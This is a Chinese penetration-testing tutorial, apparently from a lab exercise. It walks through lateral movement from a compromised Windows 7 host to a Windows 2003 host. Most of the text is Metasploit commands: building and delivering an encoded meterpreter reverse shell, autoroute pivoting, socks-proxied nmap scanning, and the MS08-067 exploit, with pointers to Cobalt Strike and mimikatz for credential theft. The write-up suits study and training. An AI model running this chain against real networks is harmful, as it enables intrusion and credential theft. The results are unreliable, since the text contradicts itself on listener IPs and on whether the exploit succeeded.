内网渗透系列-Pivoting跳板攻击与自动路由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限

服务器 0

Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限

文章目录
  • Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限
  • 前言
  • msf反弹shell
  • 配置路由
  • 存活主机探测
  • 端口扫描
  • 后记

前言

相信大家在内网渗透过程中都会遇到,进入内网后,无法访问内网页面的情况,这是我们就需要配置路由信息,访问内网页面,然后设置socks4代理进行扫描端口的信息,进而利用相关端口,利用相关的漏洞信息,进行漏洞利用,获取靶机的权限。这就是内网渗透的第一步的简单流程,当然,在后期会利用相关的工具获取密码信息,远程登录,以及权限维持和痕迹清除等操作了,我们这里主要讲的是横向移动的重要步骤之一,后续将会讲解更多关于内网渗透的知识,大家要好好复习啊。

msf反弹shell

前期我们生成了木马程序在靶机中,相关命令就不解释了,先放出来吧
木马的生成

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.131 lport=4444 -a x86 --platform windows -b “/x00/xff” -e x86 /shikata_ga_nai -f exe > msf.exe
(其中的-p是payload的木马,-a是平台架构,-b是避开字符,-e是字符编码)

这里总结一下攻击模块的步骤

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.101.102
set lport 4444
exploit

我们打开postgresql服务
service postgresql start

过滤命令
ps aux|grep python

查看端口的命令,netstat -alutp

在kali上进行监听
python -m SimpleHTTPServer 4444

生成木马后,在win7中打开kali的外网ip,也就是防火墙的外网ip,192.168.231.131,打开192.168.231.131:4444,去访问端口服务,在我们生成的木马在桌面上,我们只要打开桌面进行下载就可以了,我们在点击msf.exe,就会返回会话了。

到这里,我们只是拿到了win7的权限,在这里由于getsystem得不到system权限,所以我们只能cs上线,进行提权,这里由于只是演示,就不进行操作了。
在这里插入图片描述
在这里,我们还有一台靶机没有拿下权限,就是win03,我们为了演示跳板攻击的巧妙之处,就对win7和win03增加一个VM3的网卡,我们进行修改一下网卡的配置

模拟跳板攻击:

修改win7的网卡状态(增加一个网段:192.168.103.128)(VM3)
win03:修改网段为192.168.103.129(VM3)

在这里插入图片描述
这时我们就需要设置路由,进行内网机器的扫描了。

配置路由

run autoroute -h
在这里插入图片描述
设置路由,VM3网卡的网段
run autoroute -s 192.168.103.0/24

查看路由状态
run autoroute -p
在这里插入图片描述

存活主机探测

run post/windows/gather/arp_scanner RHOSTS=192.168.103.0/24

发现有两个靶机存活,也就是咱们的那两个靶机

[] Running module against ZHIAN2-PC
[
] ARP Scanning 192.168.103.0/24
[+] IP: 192.168.103.1 MAC 00:50:56:c0:00:03 (VMware, Inc.)
[+] IP: 192.168.103.128 MAC 00:0c:29:e5:d2:af (VMware, Inc.)
[+] IP: 192.168.103.129 MAC 00:0c:29:c3:d9:a1 (VMware, Inc.)
[+] IP: 192.168.103.255 MAC 00:0c:29:e5:d2:af (VMware, Inc.)
[+] IP: 192.168.103.254 MAC 00:50:56:ff:e8:c9 (VMware, Inc.)

在这里插入图片描述
探测网存活主机之后,我们就要进行端口扫描了,这是横向移动中的最重要的部分,我们可以直接利用漏洞信息,进行获取权限,若开放80端口,也可以进行web页面的漏洞检查,进行利用,从而getshell,进而提权,获取整个靶机的权限。

端口扫描

use auxiliary/scanner/portscan/tcp
set payload windows/meterpreter/reverse_tcp
show options
set rhosts 192.168.103.129
set ports 135,445,80,22
set threads 20
exploit

在这里插入图片描述
在这里我解释一下,也可以使用namp扫描模块,可以看看是否可以使用,但我使用不了,不过在在后面我们可以使用socks4代理进行扫描。

db_namp -sV --script=vulns 192.168.103.129(扫描不了)

在nmap模块无法扫描时,我们可以使用socks4代理进行扫描

use auxiliary/server/socks_proxy

vi /etc/proxychains.conf
加入以下这句话
socks4 192.168.101.102 1080

开始扫描端口

proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 192.168.103.129

发现存在ms08_67漏洞

search ms08_067
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp(直连payload)
show options
set rhost 192.168.103.129
run
返回会话了

上面的设置中,由于我们的win03是无法访问kali的,所以只能用kali去直连win03主机
getuid
getsystem(已经是system权限了)
在这里插入图片描述
在这里插入图片描述
在这里我扫描的时候,端口都是关闭的,不知道怎么回事,如果大家发现445端口是开放的,可以利用永恒之蓝去获取权限。或者开放80端口的话,看看有什么web服务开启,查看是否有上传点,路径遍历以及文件下载等等信息收集后,看看是否能利用漏洞点进行获取服务器权限,在进一步进行提权,拿下整个主机。这里的话,就相当于利用永恒之蓝拿下了第二胎机器,内网的两台主机就这样拿下了权限。

在这里跟大家说一下,如果遇到反弹的shell不是系统权限的话,可以利用cs上线,提升权限,因为在后渗透阶段,我们需要获取的是用户的账号和密码,用到的是mimikatz工具,而这个工具是在管理员权下才能使用的,所以我们就可以利用到cs的后渗透模块了,从而也可以直接利用相关模块获取秘密,横向移动,主机探测,获取内网主机的权限。

后记

这里,由于靶机环境没有相应的漏洞,所以没有利用成功,大家在实战环境中,可以多想想横向移动的各个方法和思路,这里只是讲解了二层网络下的渗透环境,实际上还有三层网络的渗透,其实原理都是一样的,都是经过路由和代理进行内网主机的扫描,思路就是,拿下内网中的一台主机作为跳板攻击,设置路由和socks4代理,扫描对应的端口,进行漏洞利用,从而获取另一台主机的权限,以此类推,从而获取到内网主机的权限。

也许您对下面的内容还感兴趣: